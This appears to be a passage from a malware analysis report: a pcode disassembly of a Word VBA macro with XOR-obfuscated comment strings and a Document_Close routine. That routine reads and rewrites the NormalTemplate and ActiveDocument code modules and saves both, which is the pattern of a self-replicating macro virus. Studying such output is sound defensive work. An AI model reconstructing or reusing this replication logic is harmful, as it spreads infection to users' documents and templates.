' 	QuoteRem 0x0000 0x0053 "Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg"
' Line #73:
' 	QuoteRem 0x0000 0x004F "Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf"
' Line #74:
' 	QuoteRem 0x0000 0x003D "O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd"
' Line #75:
' 	QuoteRem 0x0000 0x0091 "An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz"
' Line #76:
' 	QuoteRem 0x0000 0x003A "]c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b"
' Line #77:
' 	QuoteRem 0x0000 0x0046 "[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi"
' Line #78:
' 	QuoteRem 0x0000 0x0062 "Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,"
' Line #79:
' 	QuoteRem 0x0000 0x0008 "U~t0Gydx"
' Line #80:
' 	QuoteRem 0x0000 0x0000 ""
' Line #81:
' 	QuoteRem 0x0000 0x0000 ""
' Line #82:
' 	QuoteRem 0x0000 0x0000 ""
' Line #83:
' 	QuoteRem 0x0000 0x0000 ""
' Line #84:
' 	QuoteRem 0x0000 0x0000 ""
' Line #85:
' 	QuoteRem 0x0000 0x0000 ""
' Line #86:
' 	QuoteRem 0x0000 0x0000 ""
' Line #87:
' 	QuoteRem 0x0000 0x0000 ""
' Line #88:
' 	QuoteRem 0x0000 0x0000 ""
' Line #89:
' 	QuoteRem 0x0000 0x0000 ""
' Line #90:
' 	QuoteRem 0x0000 0x0000 ""
' Line #91:
' 	QuoteRem 0x0000 0x0000 ""
' Line #92:
' 	QuoteRem 0x0000 0x0000 ""
' Line #93:
' 	QuoteRem 0x0000 0x0000 ""
' Line #94:
' 	QuoteRem 0x0000 0x0000 ""
' Line #95:
' 	QuoteRem 0x0000 0x0000 ""
' Line #96:
' 	QuoteRem 0x0000 0x0000 ""
' Line #97:
' 	QuoteRem 0x0000 0x0000 ""
' Line #98:
' 	QuoteRem 0x0000 0x0000 ""
' Line #99:
' 	QuoteRem 0x0000 0x0000 ""
' Line #100:
' 	QuoteRem 0x0000 0x0005 " 4701"
' Line #101:
' 	EndSub 
' Line #102:
' 	FuncDefn (Private Sub Document_Close())
' Line #103:
' 	LitDI2 0x002B 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St WhereAmI 
' 	BoS 0x0000 
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemLd Characters 
' 	MemLd Count 
' 	St CH 
' 	BoS 0x0000 
' 	LitStr 0x0001 "'"
' 	Ld CH 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St Kar 
' Line #104:
' 	Ld WhereAmI 
' 	LitStr 0x000F "'NormalTemplate"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	Else 
' 	BoSImplicit 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	EndIf 
' Line #105:
' 	LitDI2 0x0065 
' 	LitDI2 0x0001 
' 	Ld Iam 
' 	ArgsMemLd Lines 0x0002 
' 	St Kar2 
' 	BoS 0x0000 
' 	LitDI2 0x0065 
' 	LitStr 0x0001 "'"
' 	Ld Iam 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' 	BoS 0x0000 
' 	Ld Kar 
' 	Ld Kar2 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' 	EndIf 
' Line #106:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.